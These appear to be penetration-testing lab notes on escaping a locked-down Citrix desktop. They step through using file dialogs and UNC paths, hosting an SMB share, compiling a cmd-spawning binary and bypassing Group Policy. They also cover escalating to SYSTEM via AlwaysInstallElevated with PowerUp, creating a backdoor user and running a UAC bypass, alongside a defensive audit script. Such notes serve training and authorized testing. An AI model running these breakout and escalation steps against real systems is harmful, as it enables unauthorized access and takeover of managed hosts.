# Citrix Breakout

## Install Citrix Receiver

{% embed url="https://docs.citrix.com/en-us/citrix-workspace-app-for-linux/install.html" %}

Download the Debian package:

{% embed url="https://www.citrix.com/downloads/workspace-app/linux/workspace-app-for-linux-latest.html" %}

```shell-session
osboxes@osboxes:~/Downloads$ sudo chmod 644 icaclient_24.5.0.76_amd64.deb
osboxes@osboxes:~/Downloads$ sudo apt install -f ./icaclient_24.5.0.76_amd64.deb
```

If you get the error "Network data corrupted - HDX has detected corrupted server data, session can not continue":

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FBoVCfCaVTjmJ4stlGTSM%2Fimage.png?alt=media&#x26;token=acbc1676-08d9-4320-b6f6-89fac552a1fc" alt=""><figcaption></figcaption></figure>

Use an older Citrix Receiver version:

```shell-session
$ wget https://deb.gymkirchenfeld.ch/pool/main/i/icaclient/icaclient_23.5.0.58_amd64.deb
$ sudo chmod 644 icaclient_23.5.0.58_amd64.deb
$ sudo dpkg -i /home/osboxes/Downloads/icaclient_23.5.0.58_amd64.deb
```

{% embed url="https://askubuntu.com/questions/1519368/citrix-icaclient-hdx-has-detected-corrupted-server-data-session-can-not-continue" %}

## Breakout

Features like Save, Save As, Open, Load, Browse, Import, Export, Help, Search, Scan, and Print usually give an attacker an opportunity to invoke a Windows dialog box. There are multiple ways to open a dialog box in Windows, using tools such as Paint, Notepad, WordPad, etc.

### With Paint

Run `Paint` from the Start menu and click `File > Open` to open the dialog box.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fk3FDM6Pxs6355WA9j9VE%2Fimage.png?alt=media&#x26;token=409dd3da-10e1-4cd1-b014-e3c60f402e40" alt=""><figcaption></figcaption></figure>

With the Windows dialog box open in Paint, enter the [UNC](https://learn.microsoft.com/en-us/dotnet/standard/io/file-path-formats#unc-paths) path `\\127.0.0.1\c$\users\pmorgan` in the File name field, set the file type to `All Files`, and press Enter to gain access to the desired directory.

### Create .bat file

{% embed url="https://0xdf.gitlab.io/2020/06/17/endgame-xen.html" %}

## Accessing an SMB share from a restricted environment

```shell-session
smbserver.py -smb2support share $(pwd)
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2Fdu2wkvDrNve4zu7px44P%2Fimage.png?alt=media&#x26;token=3b35ffd9-91b7-4da3-b141-f6a7c6773090" alt=""><figcaption></figcaption></figure>

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FD59qv0CjZAB5VKky6V47%2Fimage.png?alt=media&#x26;token=5daa663f-2aba-436b-bbb9-89fd69c0df75" alt=""><figcaption></figcaption></figure>

Right-click the `pwn.exe` binary and select `Open`; Windows prompts to run it and a cmd console opens.

pwn.exe:

```c
#include <stdlib.h>

/* Spawns an interactive cmd.exe; the new console inherits this process's token. */
int main(void) {
  system("C:\\Windows\\System32\\cmd.exe");
  return 0;
}
```

{% embed url="https://explorerplusplus.com/" %}

Use `Explorer++` to copy files from `\\10.13.38.95\share` to the Desktop of the user `pmorgan`.

Being a portable application, it can be executed directly without installation.

## Alternate Registry Editors

Alternative registry editors can be used to bypass the standard Group Policy restrictions on `regedit`. [Simpleregedit](https://sourceforge.net/projects/simpregedit/), [Uberregedit](https://sourceforge.net/projects/uberregedit/) and [SmallRegistryEditor](https://sourceforge.net/projects/sre/) are examples of such GUI tools.

## Modify existing shortcut file

```
C:\Windows\System32\cmd.exe
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F7LFD6dvFOpzU549d6Bcv%2Fimage.png?alt=media&#x26;token=3774961c-66fb-4329-a99d-66640d38f845" alt=""><figcaption></figcaption></figure>

Other options: transfer an existing shortcut file using an SMB server, or create a new shortcut file using PowerShell.

## Script Execution

1. Create a new text file and name it "evil.bat".
2. Open "evil.bat" with a text editor such as Notepad.
3. Input the command "cmd" into the file.

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F4efSt5IQr9TNayBoErry%2Fimage.png?alt=media&#x26;token=864925a6-a411-4b63-8448-d0be64b4a3b3" alt=""><figcaption></figcaption></figure>

## Escalating Privileges

Run WinPEAS or PowerUp and look for **AlwaysInstallElevated**.

{% content-ref url="miscellaneous-techniques" %}
[miscellaneous-techniques](https://0xss0rz.gitbook.io/0xss0rz/pentest/privilege-escalation/windows/miscellaneous-techniques)
{% endcontent-ref %}

```cmd-session
C:\> reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

C:\> reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
```
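A defender-side audit of the same setting, added here as an example and not part of the original notes: Windows Installer only runs MSI packages with SYSTEM privileges when `AlwaysInstallElevated` is `1` under both `HKLM` and `HKCU`, so the script reports each hive and a combined verdict.

```powershell
# Added example (not from the original notes): audit the AlwaysInstallElevated
# policy in both hives. The elevation only applies when the value is 1 under
# BOTH HKLM and HKCU; a missing key or value means "not configured".
function Get-AlwaysInstallElevatedStatus {
    $subKey = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
    $result = [ordered]@{}

    foreach ($hive in 'HKLM', 'HKCU') {
        $path  = "${hive}:\$subKey"
        $value = Get-ItemProperty -Path $path -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
        # DWORD comes back as Int32; treat an absent value as 0 (safe default).
        $result[$hive] = if ($null -ne $value) { [int]$value.AlwaysInstallElevated } else { 0 }
    }

    $result['Vulnerable'] = ($result['HKLM'] -eq 1) -and ($result['HKCU'] -eq 1)
    [pscustomobject]$result
}

$status = Get-AlwaysInstallElevatedStatus
$status | Format-List

if ($status.Vulnerable) {
    Write-Warning ('AlwaysInstallElevated is 1 in both HKLM and HKCU: any user can install ' +
                   'MSI packages as SYSTEM. Set both values to 0 (Computer/User Configuration > ' +
                   'Administrative Templates > Windows Components > Windows Installer).')
} else {
    Write-Output 'AlwaysInstallElevated is not effective on this host.'
}
```

Run it in an unprivileged session to see exactly what a low-privileged user (such as the Citrix session user above) would find with `reg query` or WinPEAS.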

```powershell-session
PS C:\Users\pmorgan\Desktop> Import-Module .\PowerUp.ps1
PS C:\Users\pmorgan\Desktop> Write-UserAddMSI

Output Path
-----------
UserAdd.msi
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FV8aaA7xdlxEXJEesZ3f2%2Fimage.png?alt=media&#x26;token=6bfab547-931e-4acd-b761-e2bb96595bfa" alt=""><figcaption></figcaption></figure>

```cmd-session
C:\> runas /user:backdoor cmd

Enter the password for backdoor: T3st@123
Attempting to start cmd as user "VDESKTOP3\backdoor" ...
```

## Bypass UAC

```cmd-session
C:\Windows\system32> cd C:\Users\Administrator

Access is denied.
```

```powershell-session
PS C:\Users\Public> Import-Module .\Bypass-UAC.ps1
PS C:\Users\Public> Bypass-UAC -Method UacMethodSysprep
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F2crEYNdaYn9jsYWQVP44%2Fimage.png?alt=media&#x26;token=a6b1bfb2-c3bb-4f1f-971d-e1817c2d5dd9" alt=""><figcaption></figcaption></figure>
